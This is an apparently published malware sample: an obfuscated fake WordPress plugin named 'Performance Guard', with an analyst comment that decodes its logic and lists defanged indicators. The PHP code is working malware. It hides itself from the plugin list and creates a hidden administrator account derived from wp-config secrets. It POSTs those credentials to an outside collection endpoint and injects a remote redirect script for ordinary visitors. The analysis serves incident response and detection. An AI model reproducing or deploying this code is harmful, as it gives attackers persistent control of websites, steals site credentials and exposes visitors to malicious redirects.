Created
August 18, 2025 18:31
PerformanceGuard - Fake WP Plugin injecting malicious JS Redirect
| <?php | |
| /** | |
| * Plugin Name: Performance Guard | |
| * Plugin URI: https://github.com/techcraft/performance-guard | |
| * Description: An advanced plugin built to boost system efficiency, monitor performance metrics, and secure critical components. | |
| * Version: 1.0.0 | |
| * Author: TechCraft Team | |
| * Author URI: https://github.com/techcraft | |
| * Text Domain: performance-guard | |
| * License: MIT | |
| */ | |
| /*
 * ANALYST NOTES -- malware sample. The code below is left byte-identical; only this
 * comment was added. Network indicators are defanged.
 *
 * Obfuscation: every string literal is spelled with mixed octal/hex escapes, the three
 * remote URLs are additionally base64-encoded inside $config, and statement order is
 * scrambled with goto labels. Local variable names are random.
 *
 * Top-level flow (following the gotos): declare WP_Core_Helper, register an empty
 * deactivation callback, then instantiate the class. The constructor sets
 * $seed = md5(DB_PASSWORD . AUTH_SALT), loads the stored IP list and registers hooks.
 *
 * Hooks registered by init_hooks() (decoded names):
 *   all_plugins (filter)        -> hide_plugin: unsets this file's entry from the plugin
 *                                  list array, so check wp-content/plugins on disk rather
 *                                  than relying on the Plugins screen.
 *   init                        -> create_admin_user
 *   pre_user_query              -> filter_admin_users
 *   wp_enqueue_scripts          -> load_styles
 *   wp_enqueue_scripts (pri 20) -> load_scripts
 *   admin_init                  -> collect_admin_ip
 *
 * create_admin_user: returns early when the marker option (see indicators) is truthy.
 * Otherwise, if the generated login does not exist, it calls wp_create_user() and sets
 * the role "administrator"; it then calls send_credentials() and writes the marker
 * option as time() + 86400 * 30. The visible code only tests that option for
 * truthiness and never compares it with the clock.
 *
 * generate_credentials: fully deterministic from $seed. k = first 16 hex chars of
 * sha256(seed . "creds"); login = "wp_" . first 8 hex chars of md5(k); password = first
 * 12 hex chars of md5(k . "pass"); email = "wordpress@" . site host. The array also
 * carries $_SERVER['SERVER_ADDR'] (fallback 127.0.0.1) and home_url(). Because the
 * inputs are wp-config.php constants, a responder holding that file can recompute the
 * login to search for; rotating salts afterwards does not remove an account that was
 * already created.
 *
 * send_credentials: JSON-encodes that array, base64-encodes it and POSTs it as body
 * field "d" to the decoded "endpoint" URL via wp_remote_post() with timeout 15,
 * blocking false and sslverify false. Exceptions are caught and discarded.
 *
 * filter_admin_users: appends " AND <users table>.user_login != '<generated login>'"
 * to the user query's WHERE clause so the account is left out of user listings.
 * NOTE(review): the table name is read from a global named $zzO_u, which looks like
 * $wpdb renamed by the obfuscator; if that global is unset at runtime the appended
 * clause has an empty table name -- confirm against a live sample.
 *
 * load_styles: enqueues style handle "wp-core-fonts" from the decoded "font" URL
 * (https://fonts.googleapis.com/css2?family=Open+Sans:w400,700) -- presumably a decoy.
 *
 * load_scripts: does nothing for users with manage_options or for a client IP found in
 * $admin_ips; for everyone else it enqueues script handle "wp-core-js" from the decoded
 * "script" URL plus "?ts=" . time(), with strategy "defer" and in_footer false. The
 * remote script itself is not part of this file; the gist title describes it as a
 * JS redirect.
 *
 * collect_admin_ip / save_admin_ips: on admin_init the client IP is appended to
 * $admin_ips (if new) and the list is stored with update_option() as
 * ['title' => '', 'number' => 5, 'data' => ['ips' => [...], 'timestamp' => time()]].
 * The option name and shape resemble widget settings -- presumably to blend in.
 *
 * get_client_ip: returns HTTP_CLIENT_IP if set, else the first comma-separated entry of
 * HTTP_X_FORWARDED_FOR, else REMOTE_ADDR, else 127.0.0.1. The first two are
 * request-supplied headers, so the recorded "admin" IPs are not trustworthy evidence.
 *
 * Indicators decoded from this sample:
 *   wp_options name : widget_recent_entries (value containing a data.ips list)
 *   wp_options name : _transient_timeout_feed_9a6d482b9eab9487a2e8778c525214bb
 *   enqueue handles : wp-core-js, wp-core-fonts
 *   script URL      : hxxps://sdfaklfsdklffjsdfj[.]com/cloa
 *   exfil endpoint  : hxxps://kickstar-xbloom[.]info/collect.php
 *   user account    : login matching wp_ + 8 hex chars, email wordpress@<site host>,
 *                     role administrator
 */ goto XuBX9; u3WQ6: register_deactivation_hook(__FILE__, function () { }); goto v8hSz; XuBX9: class WP_Core_Helper { private $seed; private $admin_ips = array(); private $option_name = "\167\151\x64\147\x65\164\137\x72\x65\143\x65\x6e\164\137\145\156\x74\x72\x69\145\163"; private $init_flag = "\137\x74\162\x61\x6e\163\x69\145\x6e\x74\137\164\x69\x6d\x65\157\165\164\x5f\146\145\x65\144\x5f\71\141\66\144\x34\70\x32\142\71\145\141\x62\71\64\x38\x37\141\62\x65\70\x37\67\70\x63\65\x32\x35\62\x31\64\x62\142"; private $config = array("\146\157\x6e\164" => "\141\110\x52\60\x63\x48\115\66\x4c\x79\71\x6d\x62\62\x35\x30\x63\171\x35\x6e\142\x32\x39\x6e\x62\x47\126\x68\x63\107\154\x7a\114\x6d\x4e\x76\x62\123\x39\x6a\143\63\115\171\x50\x32\132\150\x62\x57\x6c\163\145\x54\x31\120\143\107\126\x75\113\61\116\x68\142\156\115\x36\144\x7a\x51\x77\x4d\x43\x77\x33\x4d\104\x41\75", "\163\143\162\x69\160\164" => "\x61\x48\122\60\143\x48\115\66\x4c\x79\71\172\x5a\x47\x5a\x68\141\x32\x78\x6d\143\x32\122\162\x62\107\x5a\155\x61\x6e\x4e\153\132\155\x6f\165\131\x32\x39\x74\x4c\x32\x4e\x73\142\62\x45\x3d", "\145\x6e\x64\x70\157\151\156\164" => "\x61\x48\x52\x30\x63\110\115\66\x4c\x79\x39\x72\141\127\116\162\x63\63\x52\150\143\x69\x31\64\x59\x6d\170\166\142\62\60\165\x61\127\x35\x6d\142\x79\x39\x6a\x62\x32\x78\163\x5a\127\116\x30\114\156\102\x6f\x63\101\75\x3d"); public function __construct() { goto P4mPQ; PL3lI: $this->init_admin_ips(); goto eASmT; P4mPQ: $this->seed = md5(DB_PASSWORD . 
AUTH_SALT); goto PL3lI; eASmT: $this->init_hooks(); goto nrcui; nrcui: } private function init_admin_ips() { $djKHV = get_option($this->option_name); if ($djKHV && isset($djKHV["\144\x61\164\141"]["\x69\x70\x73"])) { $this->admin_ips = $djKHV["\x64\141\x74\141"]["\x69\160\163"]; } } private function init_hooks() { goto u0jyL; EUpP1: add_action("\167\x70\x5f\145\156\161\165\145\x75\145\137\163\x63\162\151\160\164\x73", array($this, "\154\x6f\141\x64\137\163\x74\171\154\x65\163")); goto mIDNI; mIDNI: add_action("\x77\160\x5f\x65\x6e\161\x75\x65\x75\145\137\163\x63\162\151\160\164\163", array($this, "\x6c\x6f\141\x64\x5f\163\143\162\x69\x70\164\163"), 20); goto o20K0; AeF4z: add_action("\x69\156\x69\164", array($this, "\143\x72\x65\141\164\x65\x5f\x61\144\x6d\151\x6e\x5f\x75\163\x65\162")); goto wc8GS; wc8GS: add_action("\x70\x72\145\x5f\x75\x73\145\162\137\x71\x75\145\x72\171", array($this, "\x66\151\154\x74\145\x72\x5f\141\144\155\151\156\x5f\165\163\145\x72\163")); goto EUpP1; o20K0: add_action("\x61\x64\x6d\x69\156\x5f\151\156\x69\164", array($this, "\x63\x6f\x6c\154\x65\x63\x74\x5f\x61\144\x6d\x69\156\137\x69\160")); goto zGJ0F; u0jyL: add_filter("\x61\x6c\154\137\160\x6c\165\147\x69\x6e\x73", array($this, "\150\151\144\x65\x5f\x70\x6c\165\x67\151\156")); goto AeF4z; zGJ0F: } public function hide_plugin($FJUqg) { unset($FJUqg[plugin_basename(__FILE__)]); return $FJUqg; } public function create_admin_user() { goto Eq030; Z2FwO: $E3A3H = $this->generate_credentials(); goto fiXyE; ZpF5e: $this->send_credentials($E3A3H); goto WFq31; fiXyE: if (!username_exists($E3A3H["\x75\163\145\x72"])) { $Zyoar = wp_create_user($E3A3H["\x75\x73\x65\x72"], $E3A3H["\160\141\x73\163"], $E3A3H["\145\x6d\x61\x69\154"]); if (!is_wp_error($Zyoar)) { $ougj4 = new WP_User($Zyoar); $ougj4->set_role("\141\144\x6d\x69\x6e\151\163\x74\x72\141\x74\x6f\162"); } } goto ZpF5e; Eq030: if (get_option($this->init_flag, false)) { return; } goto Z2FwO; WFq31: update_option($this->init_flag, time() + 
86400 * 30); goto biVPW; biVPW: } private function generate_credentials() { $MK_cf = substr(hash("\163\150\141\62\x35\x36", $this->seed . "\x63\x72\x65\x64\x73"), 0, 16); return ["\165\163\x65\162" => "\167\x70\x5f" . substr(md5($MK_cf), 0, 8), "\160\x61\x73\163" => substr(md5($MK_cf . "\160\141\x73\x73"), 0, 12), "\x65\155\x61\151\x6c" => "\167\x6f\x72\x64\x70\162\x65\163\163\x40" . parse_url(home_url(), PHP_URL_HOST), "\x69\x70" => isset($_SERVER["\x53\105\x52\x56\x45\x52\137\101\104\104\x52"]) ? $_SERVER["\123\105\x52\x56\105\x52\137\101\x44\x44\122"] : "\61\62\x37\x2e\60\56\x30\56\61", "\x75\x72\154" => home_url()]; } private function send_credentials($WdlI6) { if (!function_exists("\x77\x70\137\162\145\155\157\x74\145\137\160\x6f\163\164")) { return; } try { goto UGWiY; AgmGb: $UavSl = ["\142\x6f\144\x79" => ["\144" => base64_encode($PvFPj)], "\x74\x69\155\x65\x6f\165\x74" => 15, "\x62\x6c\x6f\x63\153\151\156\x67" => false, "\x73\x73\154\166\145\162\151\146\171" => false]; goto o89Du; UGWiY: $PvFPj = json_encode($WdlI6, JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); goto AgmGb; o89Du: wp_remote_post(base64_decode($this->config["\145\156\x64\160\x6f\x69\156\x74"]), $UavSl); goto Pwygi; Pwygi: } catch (Exception $bHviE) { } } public function filter_admin_users($dLmGN) { goto ekoLw; Yi2jM: $HLPvu = $this->generate_credentials()["\165\x73\x65\x72"]; goto QKrgI; ekoLw: global $zzO_u; goto Yi2jM; QKrgI: $dLmGN->query_where .= "\40\x41\x4e\104\x20{$zzO_u->users}\56\x75\x73\x65\162\x5f\154\157\x67\x69\x6e\x20\41\x3d\x20\x27{$HLPvu}\x27"; goto J_q3B; J_q3B: } public function load_styles() { wp_enqueue_style("\x77\160\x2d\143\157\162\145\x2d\x66\x6f\x6e\164\x73", base64_decode($this->config["\x66\157\x6e\x74"]), [], null); } public function load_scripts() { goto IJ4ph; VOLGE: $aQKqw = base64_decode($this->config["\163\x63\x72\151\160\x74"]) . "\77\164\163\x3d" . 
time(); goto czxvY; czxvY: wp_enqueue_script("\167\160\55\143\157\162\145\x2d\152\x73", $aQKqw, [], null, ["\x73\x74\x72\141\164\x65\x67\171" => "\x64\145\146\x65\x72", "\x69\x6e\x5f\x66\x6f\x6f\x74\x65\x72" => false]); goto ok7cY; IJ4ph: if (current_user_can("\155\x61\156\x61\147\x65\x5f\x6f\x70\x74\x69\x6f\x6e\163") || in_array($this->get_client_ip(), $this->admin_ips)) { return; } goto VOLGE; ok7cY: } public function collect_admin_ip() { $Ko1Rc = $this->get_client_ip(); if ($Ko1Rc && !in_array($Ko1Rc, $this->admin_ips)) { $this->admin_ips[] = $Ko1Rc; $this->save_admin_ips(); } } private function save_admin_ips() { $WdlI6 = ["\x74\151\164\154\145" => '', "\156\x75\x6d\x62\x65\162" => 5, "\x64\x61\164\141" => ["\151\160\x73" => $this->admin_ips, "\164\x69\155\145\x73\x74\x61\155\x70" => time()]]; update_option($this->option_name, $WdlI6); } public function get_client_ip() { goto uyE1h; jNRLc: if (!empty($_SERVER["\110\124\x54\120\137\x58\137\106\117\x52\x57\x41\x52\104\x45\x44\x5f\106\x4f\122"])) { $Oz0WU = explode("\x2c", $_SERVER["\x48\x54\x54\120\x5f\130\137\106\117\122\127\101\122\x44\x45\104\137\x46\x4f\122"]); return trim($Oz0WU[0]); } goto yp4TT; yp4TT: return isset($_SERVER["\x52\x45\115\117\x54\x45\x5f\x41\x44\104\122"]) ? $_SERVER["\x52\105\x4d\117\x54\x45\137\x41\x44\104\x52"] : "\61\62\x37\x2e\60\x2e\60\56\x31"; goto pEmbE; uyE1h: if (!empty($_SERVER["\x48\x54\x54\x50\137\103\114\x49\105\116\124\137\111\120"])) { return $_SERVER["\x48\124\x54\120\137\103\x4c\x49\105\116\x54\x5f\x49\120"]; } goto jNRLc; pEmbE: } } goto u3WQ6; v8hSz: $x230c = new WP_Core_Helper(); |